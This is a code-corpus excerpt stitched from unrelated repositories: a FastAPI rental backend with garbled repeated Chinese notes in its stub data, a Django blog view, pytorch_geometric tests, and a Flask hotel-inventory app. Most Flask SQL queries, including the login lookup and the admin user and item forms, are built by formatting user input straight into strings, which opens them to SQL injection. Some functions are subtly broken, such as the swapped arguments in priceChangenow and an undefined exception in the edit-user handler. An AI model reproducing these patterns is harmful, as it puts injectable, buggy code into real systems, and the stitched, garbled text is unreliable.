'近地铁,附近有商场!254对数据集跑一下第二版仿真工程。 -- 3月7号demo版本2. 五个城市五个机型对应的TOP5数据标注2.0 (北京只有一条) deviceId的数量大于203. 不care城市五个机型对应的TOP数据标注2.0( 2和3的deviceId不能重复 ) # 先不做254对数据集跑一下第二版仿真工程。 -- 3月7号demo版本2. 五个城市五个机型对应的TOP5数据标注2.0 (北京只有一条) deviceId的数量大于203. 不care城市五个机型对应的TOP数据标注2.0( 2和3的deviceId不能重复 ) # 先不做254对数据集跑一下第二版仿真工程。 -- 3月7号demo版本2. 五个城市五个机型对应的TOP5数据标注2.0 (北京只有一条) deviceId的数量大于203. 不care城市五个机型对应的TOP数据标注2.0( 2和3的deviceId不能重复 ) # 先不做',
'size': 100,
'floor': '高楼层',
'price': 3000,
'oriented': ['南'],
'roomType': '三室',
'supporting': ['衣柜', '洗衣机'],
'tags': ['近地铁', '集中供暖', '新上', '随时看房'],
'houseImg': [
'static/images/轮播1.jpg',
'static/images/轮播2.jpg',
'static/images/轮播3.jpg'
]}}
return response_json
@app.get("/user/houses")
async def get_user_houses(username: User = Depends(get_current_user), db: Session = Depends(DBSession)):
print('username: ', username, time.strftime('%M%S'), type(username))
response_json = {'status': 200, 'description': '请求成功', 'body': [
{'houseCode': '1111',
'title': '整租 中山路 历史最低点',
'desc':
'近地铁,附近有商场!254对数据集跑一下第二版仿真工程。',
'price': 3000,
'tags': ['近地铁', '集中供暖', '新上', '随时看房'],
'houseImg': 'static/images/轮播1.jpg'}
]}
if not username:
response_json = {'status': 400, 'description': 'token已过期', 'body': []}
print(username)
return response_json
@app.post("/user/houses")
async def post_user_houses(house: Houses, username: User = Depends(get_current_user), db: Session = Depends(DBSession)):
response_json = {'status': 200, 'description': '请求成功'}
if not username:
response_json = {'status': 400, 'description': 'token已过期'}
# print(house)
return response_json
@app.get("/area/community")
async def get_area_community(name: str, id: str):
response_json = {'status': 200, 'description': '请求成功', 'body': [
{'community': '123', 'communityName': name}
]}
return response_json
@app.get("/items/{item_id}")
def read_item(item_id: int, q: str = None):
return {"item_id": item_id, "q": q}
```
#### File: hook_up_rent/backend/utils.py
```python
from datetime import datetime, timedelta
from typing import Optional
import jwt
from fastapi import Depends
from fastapi.security import OAuth2PasswordBearer
from jwt.exceptions import PyJWTError
# from mysqlx import Session
from config import ALGORITHM, SECRET_KEY
# from orm import DBSession, DBUser, WithSession, get_db
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="/token")
# 生成token,带有过期时间
def create_access_token(data: dict, expires_delta: Optional[timedelta] = None):
to_encode = data.copy()
if expires_delta:
expire = datetime.utcnow() + expires_delta
else:
expire = datetime.utcnow() + timedelta(minutes=15)
to_encode.update({"exp": expire})
encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM)
return encoded_jwt
async def get_current_user(token: str = Depends(oauth2_scheme)):
try:
payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])
username: str = payload.get("sub")
except PyJWTError:
username = None
return username
if __name__ == "__main__":
user = get_current_user('<KEY>')
print(user)
``` |
{
"source": "jinjf553/mysite",
"score": 2
} |
#### File: mysite/blog/views.py
```python
from django.shortcuts import render, get_object_or_404
# Create your views here.
from blog.models import BlogArticles
def blog_title(request):
blogs = BlogArticles.objects.all()
return render(request, "blog/title.html", {"blogs": blogs})
def blog_article(request, article_id):
# article = BlogArticles.objects.get(id=article_id)
article = get_object_or_404(BlogArticles, id=article_id)
return render(request, "blog/content.html", {"article": article})
``` |
{
"source": "jinjh0123/pytorch_geometric",
"score": 2
} |
#### File: test/datasets/test_snap_dataset.py
```python
import os.path as osp
import random
import shutil
import sys
import pytest
from torch_geometric.datasets import SNAPDataset
@pytest.mark.skipif(True, reason="'https://snap.stanford.edu' not available")
def test_snap_dataset():
root = osp.join('/', 'tmp', str(random.randrange(sys.maxsize)))
for name in ['ego-facebook', 'soc-Slashdot0811', 'wiki-vote']:
SNAPDataset(root, name)
shutil.rmtree(root)
```
#### File: nn/conv/test_rgat_conv.py
```python
import pytest
import torch
from torch_sparse import SparseTensor
from torch_geometric.nn import RGATConv
@pytest.mark.parametrize('mod', [
'additive',
'scaled',
'f-additive',
'f-scaled',
])
@pytest.mark.parametrize('attention_mechanism', [
'within-relation',
'across-relation',
])
@pytest.mark.parametrize('attention_mode', [
'additive-self-attention',
'multiplicative-self-attention',
])
def test_rgat_conv(mod, attention_mechanism, attention_mode):
x = torch.randn(4, 8)
edge_index = torch.tensor([[0, 1, 2, 3], [0, 0, 1, 1]])
edge_type = torch.tensor([0, 2, 1, 2])
edge_attr = torch.randn((4, 8))
conv = RGATConv(8, 20, num_relations=4, num_bases=4, mod=mod,
attention_mechanism=attention_mechanism,
attention_mode=attention_mode, heads=2, dim=1, edge_dim=8)
assert str(conv) == 'RGATConv(8, 20, heads=2)'
out = conv(x, edge_index, edge_type, edge_attr)
assert out.size() == (4, 40)
def test_rgat_conv_jittable():
x = torch.randn(4, 8)
edge_index = torch.tensor([[0, 1, 2, 3], [0, 0, 1, 1]])
row, col = edge_index
edge_attr = torch.randn((4, 8))
adj = SparseTensor(row=row, col=col, value=edge_attr, sparse_sizes=(4, 4))
edge_type = torch.tensor([0, 2, 1, 2])
conv = RGATConv(8, 20, num_relations=4, num_bases=4, mod='additive',
attention_mechanism='across-relation',
attention_mode='additive-self-attention', heads=2, dim=1,
edge_dim=8, bias=False)
out = conv(x, edge_index, edge_type, edge_attr)
assert out.size() == (4, 40)
assert torch.allclose(conv(x, adj.t(), edge_type), out)
t = '(Tensor, Tensor, OptTensor, OptTensor, Size, NoneType) -> Tensor'
jit = torch.jit.script(conv.jittable(t))
assert torch.allclose(jit(x, edge_index, edge_type),
conv(x, edge_index, edge_type))
``` |
{
"source": "jinjiaho/project57",
"score": 2
} |
#### File: jinjiaho/project57/application.py
```python
from flask import Flask, render_template, request, session, redirect, url_for, flash, jsonify, g, json
from flask_babel import Babel
from flask_uploads import UploadSet, IMAGES, configure_uploads
from flaskext.mysql import MySQL
from werkzeug import generate_password_hash, check_password_hash
from datetime import datetime
from forms import LoginForm, RetrievalForm, AddUserForm, CreateNewItem,AddNewLocation,ExistingItemsLocation, RemoveItem, TransferItem
from apscheduler.schedulers.background import BackgroundScheduler
# from exceptions import InsufficientQtyError, ContainsItemsError
# from apscheduler.jobstores.mongodb import MongoDBJobStore
# from apscheduler.jobstores.sqlalchemy import SQLAlchemyJobStore
import os, copy, re, csv, json_decode, imaging, pytz
# from flask.ext.cache import Cache
# pip2 install flask
# pip2 install mysql-python
# pip2 install mysqlclient
# pip2 install flask-SQLAlchemy
# pip2 install flask-babel
# pip2 install flask-wtf
# pip2 install flask-mysql
# pip2 install flask-uploads
# pip2 install pytz
# pip2 install numpy
# pip2 install scipy
# pip2 install statsmodels
# pip2 install pandas
# pip2 install Pillow
# eb init -p python2.7 aim
# eb init
# eb create flask-env
# eb open
# eb terminate flask-env
##########################
## CONFIG ##
##########################
# Note: We don't need to call run() since our application is embedded within
# the App Engine WSGI application server.
application = Flask(__name__, instance_relative_config=True)
application.config.from_object('config.DevConfig') # default configurations
application.config.from_pyfile('config.py') # override with instanced configuration (in "/instance"), if any
#application.config.from_pyfile('myConfig1.py')
#application.config.from_pyfile('myConfig2.py')
# Babel init
babel = Babel(application)
# mysql init
mysql = MySQL()
mysql.init_app(application)
# global vars
adminmode = False
role = ""
# Configure the image uploading via Flask-Uploads
photos = UploadSet('images', IMAGES)
configure_uploads(application, photos)
sched = BackgroundScheduler()
# jobstores = {
# 'mongo': MongoDBJobStore(),
# 'default': SQLAlchemyJobStore(url='sqlite:///jobs.sqlite')
# }
# Exception classes, feel free to use.
# Called in admin()
class InsufficientQtyError(Exception):
pass
class ContainsItemsError(Exception):
pass
class InvalidPasswordError(Exception):
pass
###########################
## METHODS ##
###########################
# TODO: encapsulate all methods in separate classes and .py files
# Query for form select fields.
# Currently called by admin()
def choices(table, column, *args):
choices = []
conn = mysql.connect()
cursor = conn.cursor()
query = "SELECT {} FROM {}".format(column, table)
cursor.execute(query)
data1 = cursor.fetchall()
data2 = sorted(set(list(data1)))
for i in data2:
y=str(i[0])
x=(y,y)
choices.append(x)
return choices
# For populating select fields in admin forms with tags.
# Called by admin()
def storeTags():
choices = []
cursor = mysql.connect().cursor()
cursor.execute("SELECT tid, tname, storeroom FROM TagInfo;")
data = sorted(set(list(cursor.fetchall())))
for d in data:
value = d[0]
text = str(d[2]) + " - " + str(d[1])
pair = (value, text)
choices.append(pair)
return choices
def getAllTags():
cursor = mysql.connect().cursor()
cursor.execute("SELECT tid, tname, storeroom, remarks FROM TagInfo;")
data = sorted(set(list(cursor.fetchall())))
allTags = []
for i in data:
allTags.append({
'tid': i[0],
'tname': i[1].encode('ascii'),
'storeroom': i[2].encode('ascii'),
'remarks': i[3].encode('ascii')
})
return allTags
# Returns all the items based on category and amount in or out within the last month for each item
# Called by category()
def getAllInventory(category):
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute(
"SELECT iid, name, qty_left, reorder_pt, out_by, picture, category, ROUND(price,2) FROM Ascott_InvMgmt.view_item_locations WHERE category = '{}';".format(category))
data = cursor.fetchall()
print(data)
# cursor.execute(
# "SELECT DISTINCT iid FROM Ascott_InvMgmt.Items WHERE category = '{}';".format(category))
# unique_iid = cursor.fetchall()
# print(unique_iid)
items = []
counter = 0
for item in data:
if item[0] == counter:
pass
else:
cursor.execute(
"SELECT action, qty_moved FROM Ascott_InvMgmt.Logs WHERE month(date_time) = month(now()) AND year(date_time) = year(now()) AND item={};".format(item[0]))
in_out_data = cursor.fetchall()
delivered_out = 0
received = 0
for i in in_out_data:
if i[0].encode('ascii') == 'out':
delivered_out = delivered_out + (-1*int(i[1]))
elif i[0].encode('ascii') == "in":
received = received + int(i[1])
value_in = received*item[7]
value_out = delivered_out*item[7]
cursor.execute(
"SELECT qty_left FROM Ascott_InvMgmt.view_item_locations WHERE iid={};".format(item[0]))
location_qty = cursor.fetchall()
remaining_quantity = 0
for i in location_qty:
remaining_quantity += i[0]
initial_quantity = remaining_quantity + delivered_out - received
items.append(
{"iid":item[0],
"name": item[1],
"remaining": remaining_quantity,
"reorder": item[3],
"unit": item[4],
"starting": initial_quantity,
"received": received,
"demand": delivered_out,
"picture": item[5].encode('ascii'),
"category": item[6].encode('ascii'),
"value_in": value_in,
"value_out": value_out,
"price": item[7]
})
counter = item[0]
return items
# Quick query for inventory for mobile and web Inventory views.
# Called by inventory() and shelf()
# If location is None, we can infer that user has admin rights, and can therefore see the qty left.
def inventoryQuick(location):
items = []
conn = mysql.connect()
cursor = conn.cursor()
if location == None:
cursor.execute("""SELECT iid, name, category, picture, SUM(qty_left), reorder_pt, out_by FROM view_item_locations
GROUP BY iid;""")
data = cursor.fetchall()
for d in data:
items.append(
{"iid":d[0],
"name": d[1].encode('ascii'),
"category": d[2].encode('ascii'),
"picture": d[3].encode('ascii'),
"remaining": d[4],
"reorder": d[5],
"unit": d[6].encode('ascii')
})
else:
cursor.execute("""SELECT iid, name, category, picture, out_by FROM view_item_locations
WHERE tag='{}' AND reorder_pt >= 0;""".format(location))
data = cursor.fetchall()
conn.commit()
for d in data:
items.append(
{"iid":d[0],
"name": d[1].encode('ascii'),
"category": d[2].encode('ascii'),
"picture":d[3].encode('ascii'),
"unit":d[4].encode('ascii')
})
return items
# Stock Update Function for RA, Runner and Supervisors.
# Called by item() and shelf().
# Returns True if the stock was updated successfully, False otherwise.
def stockUpdate(iid, tagId, inputQty, user, action, time):
try:
conn = mysql.connect()
cursor = conn.cursor()
print(iid, tagId)
cursor.execute("SELECT qty_left, in_out_ratio FROM view_item_locations WHERE iid='{}' AND tag='{}';".format(iid, tagId))
data = cursor.fetchall()
print("data" ,data)
old_qty = data[0][0]
if action == 'out':
qty_left = old_qty - inputQty
qty_diff = inputQty * (-1) # make qty_input negative to reflect taking qty OUT of store.
if qty_left < 0:
raise InsufficientQtyError("Not enough in store!")
elif action == 'in':
print inputQty
print(inputQty*data[0][1])
qty_left = old_qty + inputQty*data[0][1]
qty_diff = qty_left - old_qty
else:
qty_left = inputQty
qty_diff = qty_left - old_qty # change the value of qty to the difference
conn = mysql.connect()
cursor = conn.cursor()
update_items_query = "UPDATE TagItems SET qty_left={} WHERE iid={} AND tag={};".format(qty_left, iid, tagId)
# general query for all actions
# print(update_items_query)
cursor.execute(update_items_query)
conn.commit()
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute("SELECT storeroom FROM TagInfo WHERE tid={};".format(tagId))
location = cursor.fetchall()[0][0]
# Log action
# conn = mysql.connect()
# cursor = conn.cursor()
update_logs_query = """INSERT INTO Logs (user, date_time, action, qty_moved, qty_left, item, location)
VALUES ('{}', '{}', '{}', {}, {}, {}, '{}');""".format(user, time, action, qty_diff, qty_left, iid, location)
# print(update_logs_query)
cursor.execute(update_logs_query)
conn.commit()
return ['Success!', "success"]
except InsufficientQtyError as e:
return [e.args[0], "danger"]
except Exception as e:
return ["STOCK UPDATE ERROR: %s" % e, "danger"]
# Returns all the items based on location. KIV for possible supervisor view filtering.
def getFromLevels(location):
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute("SELECT name, category, tag FROM Ascott_InvMgmt.view_item_locations WHERE tag={};".format(location))
data=cursor.fetchall()
things = []
for item in data:
things.append(
{"name": item[0],
"category": item[1],
"location":item[2]})
return things
# Returns the logs that occurred within the current month.
# Called by logs()
def getAllLogs():
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute(
"SELECT user, date_time, action, qty_moved, qty_left, item, location FROM Ascott_InvMgmt.Logs WHERE month(date_time) = month(now()) AND year(date_time) = year(now());")
data=cursor.fetchall()
print(data)
things = []
if data != None:
for row in data:
print(row[5])
cursor.execute("SELECT name, category FROM Items WHERE iid={};".format(row[5]))
info = cursor.fetchall()[0]
item_name = info[0].encode('ascii')
category = info[1].encode('ascii')
things.append({"name": row[0].encode('ascii'),
"dateTime": row[1],
"action":row[2],
"move":row[3],
"remaining":row[4],
"category":category,
"item":item_name,
"location":row[6]})
# print(things)
return things
# Returns inventory items that are below threshold levels
# Called by dashboard()
def getInventoryLow():
THRESHOLD = 1.2
cursor = mysql.connect().cursor()
cursor.execute("""SELECT iid, name, qty_left, reorder_pt, picture, category, out_by FROM Ascott_InvMgmt.view_item_locations
WHERE qty_left <= '"""+str(THRESHOLD)+"""'*reorder_pt AND
qty_left > 0
ORDER BY name ASC;""")
data = cursor.fetchall()
r = []
for i in data:
r.append({"iid": i[0],
"name": i[1].encode('ascii'),
"qty_left": i[2],
"reorder_pt": i[3],
"picture": i[4].encode('ascii'),
"category": i[5].encode('ascii'),
"unit":i[6].encode('ascii')})
return r
# Called by dashboard()
def getDailyLogs():
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute(
"SELECT user, date_time, action, qty_moved, qty_left, item, location FROM Ascott_InvMgmt.Logs WHERE day(date_time) = day(now());")
conn.commit()
data=cursor.fetchall()
things = []
for row in data:
cursor = mysql.connect().cursor()
cursor.execute("SELECT name FROM Items WHERE iid={};".format(row[5]))
item_name = cursor.fetchall()[0][0]
things.append({"name": row[0].encode('ascii'),
"dateTime": row[1],
"action":row[2].encode('ascii'),
"move":row[3],
"remaining":row[4],
"item":item_name.encode('ascii'),
"location":row[6].encode('ascii')})
return things
# POST for getting chart data
@application.route('/api/getChartData', methods=["POST"])
def getChartData():
print "CHART: content_type - ", request.content_type
print "CHART: request.json - ", request.json
if not request.json:
print "CHART: Bad JSON format, aborting chart creation..."
page_not_found(400)
else:
items = request.get_json()
iid = items[0]["iid"]
r = []
conn = mysql.connect()
cursor = conn.cursor()
for i in items:
# get transaction logs per tag
tag = i["tag"]
query = "SELECT date_time, qty_left FROM Ascott_InvMgmt.Logs WHERE item = {} AND location = '{}'".format(iid, tag)
cursor.execute(query)
data = cursor.fetchall()
r.append({
"loc": i["location"],
"val": data})
return jsonify(r)
# POST for getting chart data
@application.route('/api/editReorder', methods=["POST"])
def editReorder():
print "REORDER: content_type - ", request.content_type
print "REORDER: request.json - ", request.json
if not request.json:
print "REORDER: Bad JSON format, aborting reorder modification..."
page_not_found(400)
else:
data = request.get_json()
name = data["name"].encode('ascii')
reorder = data["reorder"]
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute(
"UPDATE Ascott_InvMgmt.Items SET reorder_pt={} WHERE (name='{}' AND iid > 0);".format(reorder, name))
conn.commit()
return jsonify("")
@application.route('/api/editPrice', methods=["POST"])
def editPrice():
print "PRICECHANGE: content_type - ", request.content_type
print "PRICECHANGE: request.json - ", request.json
if not request.json:
print "PRICECHANGE: Bad json format, aborting reorder modification..."
page_not_found(400)
else:
data = request.get_json()
iid = data["iid"].encode('ascii')
newprice = data["newprice"].encode('ascii')
effectdate = data["effectdate"].encode('ascii')
effectdate1 = datetime.strptime(effectdate , '%Y-%m-%d')
# print(type(effectdate1))
# conn = mysql.connect()
# cursor = conn.cursor()
# cursor.execute(
# "SELECT COUNT(*) FROM Ascott_InvMgmt.PriceChange WHERE item = '{}'".format(iid))
# price_changed=cursor.fetchall()
# conn = mysql.connect()
# cursor = conn.cursor()
# if price_changed[0][0] == 1:
# cursor.execute(
# "UPDATE Ascott_InvMgmt.PriceChange SET new_price= '{}' , date_effective= STR_TO_DATE( '{} 00:00:00', '%Y-%m-%d %H:%i:%s') WHERE (item = '{}');".format(newprice, effectdate, iid))
# conn.commit()
# elif price_changed[0][0] == 0:
# cursor.execute(
# "INSERT INTO Ascott_InvMgmt.PriceChange (item, new_price, date_effective) VALUES ('{}' ,'{}' ,'{}');".format(iid, newprice, effectdate))
# conn.commit()
try:
sched.remove_job(iid, jobstore=None)
except:
pass
# The job will be executed on effectdate
sched.add_job(priceChangenow, 'date', run_date=effectdate1, args=[iid,newprice], id=iid)
sched.print_jobs(jobstore=None)
# sched.start()
# print(sched.jobstores)
# idItem = cursor.fetchone()
# # query = "SELECT date_time, qty_left FROM Ascott_InvMgmt.Logs WHERE item = {0}".format(idItem)
# query = "SELECT date_time, qty_left FROM Ascott_InvMgmt.Logs WHERE item = 1"
# # TODO: string parameterisation
# # query = "SELECT datetime, qtyAfter FROM Ascott_InvMgmt.Logs WHERE idItem = {}".format(idItem)
# cursor.execute(query)
# responseData = cursor.fetchall()
return jsonify("")
def priceChangenow(iid,price):
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute("UPDATE Ascott_InvMgmt.Items SET price='{}' WHERE (iid = '{}');".format(iid,price))
conn.commit()
# conn = mysql.connect()
# cursor=conn.cursor()
# cursor.execute("DELETE FROM Ascott_InvMgmt.PriceChange WHERE (item = '{}');".format(iid))
# conn.commit()
return
# true if user is authenticated, else false
# used in ALL ROUTES
def auth():
if u'logged_in' in session:
return session['logged_in']
return False
# wrapper function for route redirection
def filter_role(roles_routes):
for k,v in roles.items():
if session['role'] == k:
return redirect(v)
# used as a Jinja template in HTML files
@application.template_filter('lang_strip')
def lang_strip(s):
l = re.search(r"(?m)(?<=(en\/)|(zh\/)|(ms\/)|(ta\/)).*$", str(s.encode('ascii')))
if l:
return l.group()
return None
# used as a Jinja template in HTML files
@application.template_filter('curr_time')
def curr_time(s):
tz = pytz.timezone(application.config["TIMEZONE"])
return s+datetime.now(tz).strftime('%I:%M %p')
# used as a Jinja template in HTML files
@application.template_filter('prop_name')
def prop_name(s):
return s+application.config["PROP_NAME"]
# case query for mobile input
def input_handler(qty, user):
query = 'UPDATE TagItems SET qty_left = CASE WHERE iid={} WHEN action'
# Issue: Need iid argument.
# fires right before each request is delivered to the relevant route
@application.before_request
def before():
# localization setting
if request.view_args and 'lang_code' in request.view_args:
if request.view_args['lang_code'] not in application.config["BABEL_LOCALES"]:
g.current_lang = application.config["BABEL_DEFAULT_LOCALE"]
else:
g.current_lang = request.view_args['lang_code']
session["lang_code"] = g.current_lang
request.view_args.pop('lang_code')
else:
session["lang_code"] = application.config["BABEL_DEFAULT_LOCALE"]
g.current_lang = session["lang_code"]
# user authentication
if u'logged_in' not in session:
session["logged_in"] = False
@application.after_request
def add_header(r):
r.headers['Cache-Control'] = 'public, max-age=0'
r.headers['Pragma'] = 'no-cache'
r.headers['Expires'] = '0'
return r
# used in setting locale for each route
# used in ALL ROUTES
@babel.localeselector
def get_locale():
return g.get('current_lang', 'en')
@application.after_request
def add_header(response):
response.cache_control.max_age=0
return response
##########################
## ROUTES ##
##########################
@application.route('/')
def hello():
# user authentication
if not session["logged_in"]:
return redirect(url_for("login", lang_code=session["lang_code"]))
else:
# user already logged_in previously
if session['role'] == "supervisor":
return redirect(url_for("dashboard", lang_code=session["lang_code"]))
elif session['role'] == "attendant":
return redirect(url_for("scanner", lang_code=session["lang_code"]))
elif session['role'] == "runner":
return redirect(url_for("scanner", lang_code=session["lang_code"]))
@application.route('/<lang_code>/login', methods=["GET", "POST"])
def login():
# create a login form to collect username & password
form = LoginForm()
if request.method == "POST":
if form.validate() == False:
return render_template("login.html", form=form)
else:
username = form.username.data
password = form.password.data
remember = form.remember.data
cursor = mysql.connect().cursor()
cursor.execute("SELECT username, password, role, name FROM User WHERE username= '{}';".format(username))
# check if user and pass data is correct by executing the db
# data is stored as a tuple
data = cursor.fetchone()
if data is None:
# username does not match records
flash('User does not exist')
return redirect(url_for("login", lang_code=get_locale()))
# elif password != <PASSWORD>:
elif check_password_hash(data[1], password) == False:
# password does not match records
flash('Incorrect password')
return redirect(url_for("login", lang_code=get_locale()))
else:
# username & password match
session['username'] = data[0]
session['role'] = data[2]
session['name'] = data[3]
session['logged_in'] = True
if remember:
session.permanent = True
# check role
if session['role'] == "supervisor":
if "next" in session:
return redirect(session.pop('next'))
else:
return redirect(url_for("dashboard", lang_code=get_locale()))
elif session['role'] == "attendant" or session['role'] == "runner":
if "next" in session:
return redirect(session.pop('next'))
else:
return redirect(url_for("scanner", lang_code=get_locale()))
elif request.method == "GET":
# user authentication
if not auth():
return render_template("login.html", form=form)
else:
# user already logged_in previously
if session['role'] == "supervisor":
return redirect(url_for("dashboard", lang_code=get_locale()))
elif session['role'] == "attendant":
return redirect(url_for("scanner", lang_code=get_locale()))
elif session['role'] == "runner":
return redirect(url_for("scanner", lang_code=get_locale()))
@application.route('/<lang_code>/admin', methods=["GET","POST"])
def admin():
form = AddUserForm()
form2 = CreateNewItem()
form3 = AddNewLocation()
form4 = ExistingItemsLocation()
removeItemForm = RemoveItem()
transferItemForm = TransferItem()
storeTagChoices = storeTags()
allTags = getAllTags()
print allTags
roles = choices('Permissions', 'role')
categories = ['Guest Hamper', 'Guest Supplies', 'Kitchenware']
cursor = mysql.connect().cursor()
cursor.execute("SELECT name, tag FROM view_item_locations;")
itemTags = cursor.fetchall()
# Initialize options for all select fields
form.role.choices = roles
form2.category.choices = choices('Items', 'category')
form3.location.choices = choices('TagInfo', 'storeroom')
form4.tid.choices = storeTagChoices
removeItemForm.iname.choices = choices('Items', 'name')
transferItemForm.tagOld.choices = storeTagChoices
transferItemForm.tagNew.choices = storeTagChoices
#--------------users table-------------------------
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute("SELECT role, name, username FROM Ascott_InvMgmt.User;")
data = cursor.fetchall()
# print(data)
things = []
for item in data:
things.append(
{"role": item[0],
"name": item[1],
"username": item[2]})
#-------------NFCID----------------------------------
cursor.execute("SELECT DISTINCT tag FROM Ascott_InvMgmt.TagItems;")
data1 = cursor.fetchall() #displays all unique NFC id tags.
NFCs=[]
group={}
items=[]
for idNFC in data1:
NFCs.append(idNFC[0])
for i in NFCs:
try:
#fetch all item names pertaining to the tag.
cursor.execute("SELECT name, iid, qty_left FROM Ascott_InvMgmt.view_item_locations WHERE tag = {};".format(i))
data3=cursor.fetchall()
cursor.execute("SELECT tname FROM TagInfo WHERE tid={};".format(i))
l_name = cursor.fetchall()[0][0]
group[(i, l_name)] = data3
except:
pass
server = "http://ec2-52-77-253-63.ap-southeast-1.compute.amazonaws.com" # For exhibition
# server = "172.16.31.10/" # For Ascott use
if request.method =="GET":
# user authentication
if not auth():
session['next'] = request.url
return redirect(url_for("login", lang_code=get_locale()))
cursor.execute("SELECT DISTINCT name FROM Ascott_InvMgmt.Items;")
items = cursor.fetchall()
# print (items)
flat_items = [item.encode('ascii') for sublist in items for item in sublist]
return render_template('admin.html',
form=form,
form2=form2,
form3=form3,
form4=form4,
removeItemForm=removeItemForm,
transferItemForm = transferItemForm,
tagsByStore = json.dumps(storeTagChoices),
itemTags = json.dumps(itemTags),
cat_list = categories,
users=things,
tags = allTags,
group=group,
server=server,
item_list=flat_items)
# ------------------All the various form tabs----------------------
# ------------------Add User Form ----------------------
elif request.method == "POST":
if request.form['name-form'] =='form':
if form.validate() == False:
flash("Failed to validate form", "danger")
return render_template('admin.html',
form=form,
form2=form2,
form3=form3,
form4=form4,
removeItemForm=removeItemForm,
transferItemForm = transferItemForm,
tagsByStore = json.dumps(storeTagChoices),
itemTags = json.dumps(itemTags),
cat_list = categories,
users=things,
tags = allTags,
server=server,
group=group)
else:
username = form.username.data
password = generate_password_hash(form.password.data)
role = form.role.data
name = form.name.data
newuser=[username,password,role,name]
conn = mysql.connect()
cursor = conn.cursor()
# TODO: string parameterisation
query = "INSERT INTO User VALUES ('{}','{}','{}','{}');".format(newuser[0],newuser[1],newuser[2],newuser[3])
# query = "INSERT INTO User (username,password,role,name) VALUES ();"
# print(query)
cursor.execute(query)
conn.commit()
# cursor.execute("COMMIT")
flash("User has been added!", "success")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Edit User Form ----------------------
elif request.form['name-form'] =='editUserForm':
try:
username = request.form["username"]
role = request.form["role"]
name = request.form["name"]
password = request.form["password"]
query = ""
messages = []
if role:
query += "UPDATE User SET role='{}' WHERE username='{}';".format(role, username)
messages.append(["User role updated to "+role, "success"])
if name:
query += "UPDATE User SET name='{}' WHERE username='{}';".format(name, username)
messages.append(["Name updated to "+name, "success"])
if password:
if auth():
query += "UPDATE User SET password='{}' WHERE username='{}';".format(generate_password_hash(password), username)
messages.append(["Password updated!", "success"])
else:
raise Exception("User authentication failed, please login again.")
conn = mysql.connect()
cursor = conn.cursor()
print query
cursor.execute(query)
conn.commit()
for i in messages:
flash(i[0], i[1])
except:
flash(e.args[0], "danger")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Delete User Form ----------------------
elif request.form['name-form'] =='deleteUser':
print('form received')
username = request.form["username"]
try:
conn = mysql.connect()
cursor = conn.cursor()
query = "DELETE FROM User WHERE username='{}';".format(username)
print(query)
cursor.execute(query)
conn.commit()
flash("User deleted!", "success")
except:
flash("Oops! Something went wrong :(", "danger")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Add Item Form ----------------------
elif request.form['name-form'] =='form2':
if form2.validate() == False:
flash("Failed to validate form", "danger")
return render_template('admin.html',
form=form,
form2=form2,
form3=form3,
form4=form4,
removeItemForm=removeItemForm,
transferItemForm = transferItemForm,
tagsByStore = json.dumps(storeTagChoices),
itemTags = json.dumps(itemTags),
cat_list = categories,
users=things,
tags = allTags,
server=server,
group=group)
else:
itemname = form2.itemname.data
reorderpt = form2.reorderpt.data
category = form2.category.data
price = form2.price.data
out_by = form2.count_unit.data
in_by = form2.order_unit.data
in_out_ratio = form2.order_multiplier.data
if 'photo' in request.files:
try:
filename = photos.save(request.files['photo'])
except:
filename = "default.thumb"
flash('Photo selected is not a valid file', "danger")
thumbnail = imaging.Imaging().thumb(filename)
item = [itemname, category, thumbnail, price, reorderpt, out_by, in_by, in_out_ratio]
print(item)
try:
# TODO: string parameterisation
conn = mysql.connect()
cursor = conn.cursor()
# TODO: Change form to input appropriate information
query = "INSERT INTO Items (name, category, picture, price, reorder_pt, out_by, in_by, in_out_ratio) VALUES ('{}','{}','{}','{}','{}','{}','{}','{}');".format(item[0],item[1],item[2],item[3],item[4],item[5],item[6],item[7])
cursor.execute(query)
conn.commit()
flash("Item has been added! Next, please assign a tag.", "success")
except Exception as e:
print(e)
flash("Oops! Something went wrong :(", "danger")
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Remove Item Form ----------------------
elif request.form['name-form'] == 'removeItemForm':
if removeItemForm.validate() == False:
flash("Failed to validate form", "danger")
return render_template('admin.html',
form=form,
form2=form2,
form3=form3,
form4=form4,
removeItemForm=removeItemForm,
transferItemForm = transferItemForm,
tagsByStore = json.dumps(storeTagChoices),
itemTags = json.dumps(itemTags),
cat_list = categories,
users=things,
tags = allTags,
server=server,
group=group)
else:
iname = removeItemForm.iname.data
conn = mysql.connect()
cursor = conn.cursor()
cursor.execute("SELECT iid, picture FROM Items WHERE name='{}';".format(iname))
response = cursor.fetchall()[0]
try:
iid, picture = response[0], response[1].encode("ascii")
print "ADMIN: Deleting item #%s with thumbnail '%s' ..." % (iid, picture)
removeFromItems = "DELETE FROM Items WHERE name='{}';".format(iname)
print "SQL: %s" % removeFromItems
cursor.execute(removeFromItems)
conn.commit()
removeFromLogs = "DELETE FROM Logs WHERE item='{}';".format(iid)
print "SQL: %s" % removeFromLogs
cursor.execute(removeFromLogs)
conn.commit()
removeFromPriceChange = "DELETE FROM PriceChange WHERE item='{}';".format(iid)
print "SQL: %s" % removeFromPriceChange
cursor.execute(removeFromPriceChange)
conn.commit()
removeFromTagItems = "DELETE FROM TagItems WHERE iid='{}';".format(iid)
print "SQL: %s" % removeFromTagItems
cursor.execute(removeFromTagItems)
conn.commit()
try:
os.remove("static/img/items/"+picture)
print("ADMIN: Item successfuly deleted!")
except Exception as e:
print("DELETE THUMBNAIL: %s" % e)
flash('Item deleted!', 'success')
except IndexError:
flash("Item not found!", "warning")
except Exception as e:
print("DELETE ITEM: %s" % e)
flash('Couldn\'t delete item', 'danger')
return redirect(url_for('admin', lang_code=get_locale()))
# ------------------Add Existing Items to New Locations form ----------------------
